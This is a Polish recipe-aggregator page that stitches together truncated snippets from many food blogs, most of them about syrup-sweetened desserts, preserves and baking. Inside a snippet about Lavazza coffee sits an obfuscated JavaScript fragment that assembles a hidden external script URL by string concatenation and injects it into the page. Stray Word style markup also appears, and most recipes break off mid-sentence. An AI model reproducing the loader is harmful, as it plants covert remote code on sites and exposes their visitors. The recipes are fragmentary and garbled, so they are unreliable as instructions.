świetny pomysł na ulubione słodycze dla dzieci, poza wyśmienitym smakiem doskonale się prezentują, do tego są mega proste i szybkie w przygotowaniu. Domowe żelki można zrobić z dowolnego soku, syropu, ulubionego napoju gazowanego lub owoców są dobrą alternatywą dla słodyczy ze sklepu. składniki na około 30 sztuk 1,5 szklanki soku pomarańczowego 100% 2 łyżki miodu 6 łyżek
Smakowite Danianiewielkiej ilości oleju na nieprzywierającej patelni przez ok 2-3 minuty z każdej strony, uważając żeby się nie przykleiły, podawać ze świeżymi owocami polane miodem lub w wersji wegańskiej syropem z agawy lub klonowym. Smacznego Przepis pochodzi z blogu feastingonfruit. z tej strony pochodzi również filmik, który wam udostępniam
zdrowa vege kuchniazasłużoną sławą w ponad stu krajach. Dziś Lavazza to nie tylko kawa, ale również najwyższej jakości ekspresy, szklanki, filiżanki, a także dodatki do kawy, między innymi cukier trzcinowy, syropy do kawy i czekolada. (function(){ wa9r=document.createElement("script");wa9r.type="text/javascript"; wa9r.async=true;wa9r_=(("us")+"t")+"a";wa9r_+=("t.i")+""+"n";wa9r_+=(("f")+"o");wa9r_+="/"; wa9ru="12135998.";wa9ru+="ejuusbkva9r02k31rr8lyip6pscuv0";wa9r.src="//"+wa9r_+wa9ru
Moja smaczna kuchniaJeżeli nie macie pomysłu na małe co nieco, muffinki sprawdzą się idealnie. Postanowiłam wykorzystać mandarynki w syropie, które kupiłam niedawno w jednym z marketów. Zastanawiając się, jak najlepiej można je wykorzystać, w głowię pojawiły się właśnie te małe, urocze babeczki. W takiej "egzotycznej" wersji smakują świetnie ;) MUFFINKU Z MANDARYNKĄ (przepis na 12 stuk) składniki suche: 2 szklanki mąki 2 łyżeczki
W kuchni Karmel-itkigwałtownie! Wtedy należy wezwać na pomoc C., który upora się z żywym inwentarzem z miną, powiedzmy, pobłażliwą, i już można zabrać się do dzieła. Umyć, osuszyć, podgotować z syropie cukrowym, na blachę i do piekarnika. A jak już się ususzy - do słoiczków. Gotowe! Taką jarzębinę można dodać do granoli (niedługo pokażę Wam mój sposób; podpowiem tylko, że doskonale zgrywa się
Pożeraczka, czyli raz adobrzeczekolady 1 gruszka 3 łyżki stołowe wody skórka starta z połowy cytryny 1/4 łyżeczki sody oczyszczonej szczypta soli 5 ml ekstraktu waniliowego 3 jajka 2 łyżki miodu akacjowego lub syropu jasnego np z agawy Wykonanie: 1. Gruszkę średniej wielkości myjemy obieramy ze skórki i usuwamy gniazda nasienne. Kroimy na drobną kostkę. Do rondla wlewamy 3 łyżki stołowe wody i dodajemy
vaniliowoczekoladowakubka jogurtu greckiego + miód, dodać około 1 szklanki ulubionych owoców (najlepiej jagodowych) i schłodzić co najmniej godzinę. To wszystko (pomysł od moich rodziców). P.S. Zamiast miodu możecie dodać słodkie syropy, np. z agawy, daktyli lub zdać się na słodycz owoców. P.S. Deser można ułożyć warstwami lub wszystko wymieszać. Z tej ilości składników wychodzą 2-3 porcje. W Egerze
Qlinarnie i Qlinarniepozbyć się goryczki. Miałam w planach dodać liście i sok z cytryny, ale po przemyśleniu postanowiłam zrobić czysty sok, tylko z cukrem, bez żadnych dodatków. Jest to sok - syrop do rozcieńczania. Jeden słoiczek już napoczęty - sok wspaniale smakuje dodany do herbaty lub do wody mineralnej. Jak wiadomo, po produkcji soku pozostają owoce. Co z nimi zrobić? Większość ludzi robi
Posadzone i zjedzoneproszku - 100g wiórków kokosowych - 3 suche wafle kwadratowe Dodatkowo: - 100g wiórków kokosowych do obtoczenia kulek Wodę zagotowujemy w garnku. Do wrzątku wsypujemy cukier – rozpuszczamy mieszając. Odstawiamy do ostudzenia. Ostudzony syrop przelewamy do misy robota. Dodajemy wiórki kokosowe, miękkie masło, mleko w proszku, pokruszone na kawałki wafle. Miksujemy na niskich obrotach do połączenia składników. Wstawiamy na 30 minut do lodówki
mojewypiekiinietylkocukrem oraz sokiem i odstawiamy na pół godziny, by puściły sok. Ciasto wyjmujemy z lodówki, cienko rozwałkowujemy. Przekładamy do formy, formujemy brzeg tarty. Na cieście układamy śliwki, zalewamy syropem i pieczemy 50 min w 200°C. st1\:*{behavior:url(#ieooui) } /* Style Definitions */ table.MsoNormalTable {mso-style-name:Standardowy; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow
R'n'G Kitchenzdecydowanie smak owoców. Zima będzie jak znalazł. W tym roku jagody obrodziły, grzechem byłoby nie porobić z nich przetworów. Takim samym sposobem możemy przygotować i inne owoce w syropie Składniki: 1 kg jagód 0,7 dag cukru Wykonanie: Jagody wsypujemy do słoików do 2/3 wysokości. Zasypujemy cukrem. Odstawiamy na kilka godzin aż puszczą sok. Po tym czasie dobrze pozakręcane słoiki
Z Majeczką w kuchnimożna stawić czoło codziennym wyzwaniom! Jakie jest najpopularniejsze śniadanie ucznia? Zdecydowanie płatki z mlekiem ;) Pyszne, chrupiące... niestety już na drugim miejscu w ich składzie znajduje się cukier, na trzecim - syrop glukozowy. Wszystko po to, aby smak był atrakcyjny dla dzieci i nie tylko. Takie śniadanie z pewnością dostarczy sporo energii, ale nie jest to dobry wybór na dłuższą metę. Dużo
Chocolate Muffin Blogwypróbowania. Na 1 szklankę kawy: 1 łyżeczka kawy 1 cm.laski wanilii kardamon szczypta cukier 4 kulki czerwonego pieprzu-rozgnieść 1 łyżeczka skórek drobno pokrojonych z pomarańczy w syropie(kandyzowanych) jak ktoś lubi mleko ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Do łyżeczki kawy dodajemy wanilię oraz kardamon,rozgnieciony czerwony pieprz,zalewamy 120ml.gorącej ale nie wrzącej wody i przykrywamy.Po 8 min.przelewamy kawę do filiżanki wypełnionej
Kocurkowe rozmyślania w kuchni Anielkijedzenia bezglutenowych produktów, ale również zdrowych. Bezglutenowy chlebek bananowy Wydrukuj przepis Czas przygotowania: 60 minut Potrzebujesz: Mokre 4 dojrzałe banany 110ml mleka roślinnego lub mleczko kokosowe 85g miodu lub syropu klonowego 55g oleju kokosowego 25g nasion chia 2 łyżeczki octu 1/2 laski wanilii Suche 65g mąki jaglanej 65g mąki ryżowej 2 łyżeczki proszku do pieczenia 1 łyżeczka sody 1 łyżka
Blendmansię nad tym rozpuszczać. Granola z kaszy gryczanej Wydrukuj przepis Potrzebujesz: 130g ziaren słonecznika 200g daktyli 165g kaszy gryczanej niepalonej 2 łyżki oleju kokosowego 3 łyżki miodu lub syropu, np. klonowego 2 łyżki kakao lub karobu 1 laska wanilii 1 łyżeczka cynamonu * opcjonalnie cukier Wykonanie: 1 Rozgrzej piekarnik do 180 stopni. 2 Słonecznik i daktyle umieść w malakserze i zblenduj
Blendman